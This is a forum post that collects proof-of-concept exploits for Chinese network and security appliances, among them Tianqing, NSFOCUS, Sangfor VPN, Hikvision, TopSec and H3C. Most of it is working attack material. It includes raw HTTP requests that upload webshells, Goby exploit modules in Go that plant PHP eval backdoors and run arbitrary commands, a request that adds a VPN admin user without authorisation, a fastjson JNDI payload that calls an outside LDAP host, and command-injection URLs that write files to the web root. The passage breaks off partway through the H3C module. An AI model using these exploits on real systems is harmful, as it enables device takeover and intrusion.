设备漏洞 PoC 整理-DecoyMini 技术交流社区

吉沃运营专员 发表于 2022-8-4 11:58:04

设备漏洞 PoC 整理

本文内容为互联网上收集，禁止用于非法用途，仅供学习使用！
1、360 天擎任意文件上传
/api/client_upload_file.json 存在任意文件上传漏洞

POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456
78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
Host: 192.168.11.210
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 323
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox
Q
Referer: http://192.168.11.210
Accept-Encoding: gzip
------WebKitFormBoundaryLx7ATxHThfk91oxQ
Content-Disposition: form-data; name="file"; filename="flash.php"
Content-Type: application/xxxx
if ngx.req.get_uri_args().cmd then
cmd = ngx.req.get_uri_args().cmd
local t = io.popen(cmd)
local a = t:read("*all")
ngx.say(a)
end------WebKitFormBoundaryLx7ATxHThfk91oxQ--
2、网康科技网关 RCE
/scripts/aitrain.php

3、绿盟下一代防火墙任意文件上传漏洞
resourse.php

package exploits

import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"net/url"
"strings"
"time"
)

func init() {
expJson := `{
 "Name": "nsfocus resourse.php arbitrary file upload vulnerability",
 "Description": "NSFOCUS Next Generation Firewall is a dedicated security firewall device. There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions. ",
 "Product": "nsfocus",
"Homepage": "https://www.nsfocus.com.cn/",
"DisclosureDate": "2022-07-18",
"Author": "LittleBlack",
"FofaQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"",
"GobyQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"",
"Level": "3",
 "Impact": "There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions. ",
 "Recommendation": "1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a> ",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
 "name": "cmd",
 "type": "input",
 "value": "system('id');",
 "show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
 "Request": {
 "method": "GET",
 "uri": "/test.php",
 "follow_redirect": true,
 "header": {},
 "data_type": "text",
 "data": ""
 },
 "ResponseTest": {
 "type": "group",
 "operation": "AND",
 "checks": [
 {
 "type": "item",
 "variable": "$code",
 "operation": "==",
 "value": "200",
 "bz": ""
 },
 {
 "type": "item",
 "variable": "$body",
 "operation": "contains",
 "value": "test",
 "bz": ""
 }
 ]
 },
 "SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
 "Request": {
 "method": "GET",
 "uri": "/test.php",
 "follow_redirect": true,
 "header": {},
 "data_type": "text",
 "data": ""
 },
 "ResponseTest": {
 "type": "group",
 "operation": "AND",
 "checks": [
 {
 "type": "item",
 "variable": "$code",
 "operation": "==",
 "value": "200",
 "bz": ""
 },
 {
 "type": "item",
 "variable": "$body",
 "operation": "contains",
 "value": "test",
 "bz": ""
 }
 ]
 },
 "SetVariable": []
}
],
"VulType": [
 "Code Execution"
 ],
 "Tags": [
 "Code Execution"
 ],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "9.5",
"Translation": {
"CN": {
 "Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞",
 "Product": "绿盟下一代防火墙",
 "Description": "绿盟下一代防火墙是一款专用安全防火墙设备。 绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞，攻击者可上传恶意木马，获取服务器权限。 ",
 "Recommendation": "1、阻拦8081端口访问。2、及时关注官网更新：<a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a> ",
 "Impact": "绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞，攻击者可上传恶意木马，获取服务器权限。 ",
 "VulType": [
 "代码执⾏"
 ],
 "Tags": [
 "代码执⾏"
 ]
},
"EN": {
 "Name": "nsfocus resourse.php 任意文件上传漏洞",
 "Product": "nsfocus",
 "Description": "NSFOCUS Next Generation Firewall is a dedicated security firewall device. There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions. ",
 "Recommendation": "1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a> ",
 "Impact": "There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions. ",
 "VulType": [
 "Code Execution"
 ],
 "Tags": [
 "Code Execution"
 ]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

 u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")
 uri1 := "/api/v1/device/bugsInfo"
 cfg1 := httpclient.NewPostRequestConfig(uri1)
 cfg1.VerifyTls = false
 cfg1.FollowRedirect = false
 cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
 cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
 if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
 time.Sleep(time.Second * 5)
 uri2 := "/api/v1/device/bugsInfo"
 cfg2 := httpclient.NewPostRequestConfig(uri2)
 cfg2.VerifyTls = false
 cfg2.FollowRedirect = false
 cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
 cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
 if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
 u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")
 uri3 := "/mail/include/header_main.php"
 cfg3 := httpclient.NewPostRequestConfig(uri3)
 cfg3.VerifyTls = false
 cfg3.FollowRedirect = false
 cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
 cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
 cfg3.Data = "1=print+md5%281%29%3B"
 if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {
 return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")
 }

 }
 }

 return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
 cmd := ss.Params["cmd"].(string)

 u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")
 uri1 := "/api/v1/device/bugsInfo"
 cfg1 := httpclient.NewPostRequestConfig(uri1)
 cfg1.VerifyTls = false
 cfg1.FollowRedirect = false
 cfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")
 cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"
 if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {
 time.Sleep(time.Second * 5)
 uri2 := "/api/v1/device/bugsInfo"
 cfg2 := httpclient.NewPostRequestConfig(uri2)
 cfg2.VerifyTls = false
 cfg2.FollowRedirect = false
 cfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")
 cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"
 if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {
 u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")
 uri3 := "/mail/include/header_main.php"
 cfg3 := httpclient.NewPostRequestConfig(uri3)
 cfg3.VerifyTls = false
 cfg3.FollowRedirect = false
 cfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")
 cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")
 cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))
 if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {
 expResult.Output = resp3.RawBody
 expResult.Success = true
 }

 }
 }
 return expResult
},
))
}
4、深信服 VPN 任意用户添加漏洞
用户管理接口的权限控制出现漏洞，攻击者可任意添加用户

POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=User&action=AddUser&token=e52021a4c9c962ac9cc647effddcf57242d152d9 HTTP/1.1
Host: xxxxxx
Cookie:language=zh_CN;sinfor_session_id=W730120C88755A7D932019B349CCAC63;PHPSESSID=cb12753556d734509d4092baabfb55dd;x-anti-csrf-gcs=A7DBB1DC0050737E;usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%22-1%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D;hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D
Content-Length: 707
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://xxxxxx
X-Forwarded-For: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://xxxxxx/html/tpl/userMgt.html?userid=0&groupid=-1&createRole=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

name=admin1&note=admin1&passwd=Admin%40123&passwd2=Admin%40123&phone=&grpid=-1&grptext=%2F%E9%BB%98%E8%AE%A4%E7%94%A8%E6%88%B7%E7%BB%84&selectAll=1&b_inherit_auth=1&b_inherit_grpolicy=1&is_Autoip=1&allocateip=0.0.0.0&gqsj=1&ex_time=2027-07-29&is_enable=1&is_public=1&is_pwd=1&first_psw_type=-1&second_server=&auth_type=0&ext_auth_id=&token_svr_id=%E8%AF%B7%E9%80%89%E6%8B%A9&grpolicy_id=0&grpolicytext=%E9%BB%98%E8%AE%A4%E7%AD%96%E7%95%A5%E7%BB%84&roleid=&roletext=&year=&month=&day=&isBindKey=&userid=0&crypto_key=&szcername=&caid=-1&certOpt=0&create_time=&sec_key=&first_psw_name=%E6%9C%AC%E5%9C%B0%E6%95%B0%E6%8D%AE%E5%BA%93&first_psw_id=&second_psw_name=&second_psw_id=&is_extauth=0&secondAuthArr=%5B%5D
5、海康威视综合运营管理平台 RCE 漏洞
URL：

/bic/ssoService/v1/applyCT
Payload：

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnstunnel.run","autoCommit":true}}
6、安恒明御网关注入
/webui/?g=aaa_portal_auth_config_reset&type=1
7、安恒数据大脑 API 网关任意密码重置漏洞
在前端代码中包含重置密码的连接以及密码加密方式

安恒数据大脑 API (https://www.websaas.cn/) 存在任意密码重置漏洞

这里以网站 https://waf-mgmt.pinganyun.com/q/#/ 为例，在前端代码中包含重置密码的连接以及密码加密方式，按照前端代码说明，构造重置密码数据包

此处重置的密码为：p@ssw0rd

POST /q/common-permission/public/users/forgetPassword HTTP/1.1
Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Language: en-US,en;q=0.5
Content-type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104
{"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use
rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}
8、奇安信天擎安全管理系统 getshell
client_upload_file.json

package exploits

import (
"fmt"
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)

func init() {
expJson := `{
"Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell",
"Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.",
"Product": "360-TianQing",
"Homepage": "https://www.qianxin.com/product/detail/pid/49",
"DisclosureDate": "2021-04-09",
"Author": "itardc@163.com",
"FofaQuery": "app=\"360-TianQing\"",
"GobyQuery": "app=\"360-TianQing\"",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [
"http://fofa.so"
],
"HasExp": true,
"ExpParams": [
{
 "name": "cmd",
 "type": "input",
 "value": "whoami"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
 "Request": {
 "data": "",
 "data_type": "text",
 "follow_redirect": true,
 "method": "GET",
 "uri": "/"
 },
 "ResponseTest": {
 "checks": [
 {
 "bz": "",
 "operation": "==",
 "type": "item",
 "value": "200",
 "variable": "$code"
 }
 ],
 "operation": "AND",
 "type": "group"
 }
}
],
"ExploitSteps": null,
"Tags": ["getshell"],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["360-TianQing"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
 randomFilename := goutils.RandomHexString(4)
 cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename))
 cfg.VerifyTls = false
 cfg.FollowRedirect = false
 cfg.Header.Store("Referer", u.FixedHostInfo)
 cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
 cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
 cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
 cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n"
 cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
 cfg.Data += "hello,world\r\n"
 cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
 if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 {
 return strings.Contains(resp.Utf8Html, "\"status\":true") &&
 strings.Contains(resp.Utf8Html, "upload file success")
 }
 return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
 randomFilename := goutils.RandomHexString(4)
 cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename))
 //cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC")
 cfg.VerifyTls = false
 cfg.FollowRedirect = false
 cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo)
 cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B")
 cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ")
 cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n"
 cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n"
 cfg.Data += "Content-Type: application/xxxx\r\n\r\n"
 cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n"
 cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n"
 cfg.Data += "local t = io.popen(cmd)\r\n"
 cfg.Data += "local a = t:read(\"*all\")\r\n"
 cfg.Data += "ngx.say(a)\r\n"
 cfg.Data += "end\r\n"
 cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--"
 httpclient.DoHttpRequest(expResult.HostInfo, cfg)
 cmd := ss.Params["cmd"].(string)
 if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 {
 expResult.Success = true
 expResult.Output = resp.Utf8Html
 }
 return expResult
},
))
}
9、天融信 - 上网行为管理系统 RCE
一句话：

/view/IPV6/naborTable/static_convert.php?blocks=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a
Base64 版：

/view/IPV6/naborTable/static_convert.php?blocks=||%20echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-d%20%3E%3E%20/var/www/html/1.php%0a

package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"net/url"
"strings"
)

func init() {
expJson := `{"Name":"TopSec TopACM Remote Command Execution","Description":"Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.","Product":"TopSec-TopACM","Homepage":"https://www.topsec.com.cn/product/27.html","DisclosureDate":"2022-07-28","Author":"su18@javaweb.org","FofaQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","GobyQuery":"body=\"ActiveXObject\" && body=\"name=\\\"dkey_login\\\" \" && body=\"repeat-x left top\"","Level":"3","Impact":"There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information. ","Recommendation":"At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a> ","References":["https://mp.weixin.qq.com/s/5UMEIrDiG5hQFofByYH78g"],"Is0day":false,"HasExp":true,"ExpParams":[{"name":"cmd","type":"input","value":"echo%20PD9waHAgcGhwaW5mbygpOw==%20|base64%20-d%20%3E/var/www/html/3.php","show":""}],"ExpTips":{"Type":"","Content":""},"ScanSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":false,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"ExploitSteps":["AND",{"Request":{"method":"GET","uri":"/test.php","follow_redirect":true,"header":[],"data_type":"text","data":""},"ResponseTest":{"type":"group","operation":"AND","checks":[{"type":"item","variable":"$code","operation":"==","value":"200","bz":""},{"type":"item","variable":"$body","operation":"contains","value":"test","bz":""}]},"SetVariable":[]}],"Tags":["Command Execution"],"VulType":["Command Execution"],"CVEIDs":[""],"CNNVD":[""],"CNVD":[""],"CVSSScore":"9.8","Translation":{"CN":{"Name":"天融信上网行为管理系统命令执行","Product":"天融信-上网行为管理系统","Description":"天融信上网行为管理系统（TopACM）综合考虑各行业客户需求，为客户提供安全策略、链路负载、身份认证、流量管理、行为管控、上网审计、日志追溯、网监对接、用户行为分析、VPN等实用功能。产品具有良好的网络适应性并满足《网络安全法》、公安部151号令、等保2.0等关于用户行为审计和日志留存的相关要求。目前产品广泛应用于政府、教育、能源、企业、运营商等各类行业，协助客户规范网络、提高工作效率、挖掘数据价值。 天融信上网行为管理系统存在任意命令执行漏洞，攻击者可以在系统上执行任意命令，写入文件，获取webshell，读取敏感信息。 ","Recommendation":"目前厂商还未发布安全补丁，请关注官方更新。<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a>","Impact":"天融信上网行为管理系统存在任意命令执行漏洞，攻击者可以在系统上执行任意命令，写入文件，获取webshell，读取敏感信息。 ","VulType":["命令执⾏"],"Tags":["命令执⾏"]},"EN":{"Name":"TopSec TopACM Remote Command Execution","Product":"TopSec-TopACM","Description":"Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.Topacm comprehensively considers the needs of customers in various industries and provides customers with practical functions such as security strategy, link load, identity authentication, traffic management, behavior control, online audit, log tracing, network supervision docking, user behavior analysis, VPN, etc. The product has good network adaptability and meets the relevant requirements on user behavior audit and log retention in the network security law, Ministry of public security order 151, etc. At present, the products are widely used in government, education, energy, enterprises, operators and other industries to help customers standardize the network, improve work efficiency, and mine data value.There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.","Recommendation":"At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a> ","Impact":"There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information. ","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}`

exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool {
// 攻击 URL
requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks=|%20" + url.QueryEscape(cmd))
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
requestConfig.Timeout = 15

// 发送攻击请求
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
 if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") {
 return true
 }
}
return false
}

checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
// 攻击 URL
requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php")
requestConfig.VerifyTls = false
requestConfig.FollowRedirect = false
requestConfig.Timeout = 15

// 发送攻击请求
if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
 if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) {
 return true
 }
}
return false
}

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

 // 生成随机文件名
 randomFileName := goutils.RandomHexString(6)

 // 漏洞攻击包，POC 使用自删除的文件
 // <?php echo md5(233);unlink(__FILE__);
 if exploitTopACM092348783482("echo PD9waHAgZWNobyBtZDUoMjMzKTt1bmxpbmsoX19GSUxFX18pOw== |base64 -d >/var/www/html/"+randomFileName+".php", u) {
 return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u)
 }

 return false
},
func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {

 cmd := ss.Params["cmd"].(string)

 if exploitTopACM092348783482(cmd, expResult.HostInfo) {
 expResult.Success = true
 expResult.Output = "命令执行成功"
 }

 return expResult
},
))
}

// https://heiwado.cn:8443/
10、H3C 企业路由器 (ER、ERG2、GR 系列) 任意用户登录/命令执行
/userLogin.asp/actionpolicy_status/

11、H3C CVM 前台任意文件上传漏洞
package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)

func init() {
expJson := `{
 "Name": "H3C CVM Arbitrary File Upload Vulnerability",
 "Description": "H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc. ",
 "Product": "H3C-CVM",
"Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/",
"DisclosureDate": "2022-05-25",
"Author": "su18@javaweb.org",
"FofaQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")",
"GobyQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")",
"Level": "3",
 "Impact": "H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc. ",
 "Recommendation": "At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a> ",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
 "name": "fileName",
 "type": "input",
 "value": "evil",
 "show": ""
},
{
 "name": "fileContent",
 "type": "input",
 "value": "<%out.println(\"123\");%>",
 "show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
 "Request": {
 "method": "GET",
 "uri": "/test.php",
 "follow_redirect": true,
 "header": {},
 "data_type": "text",
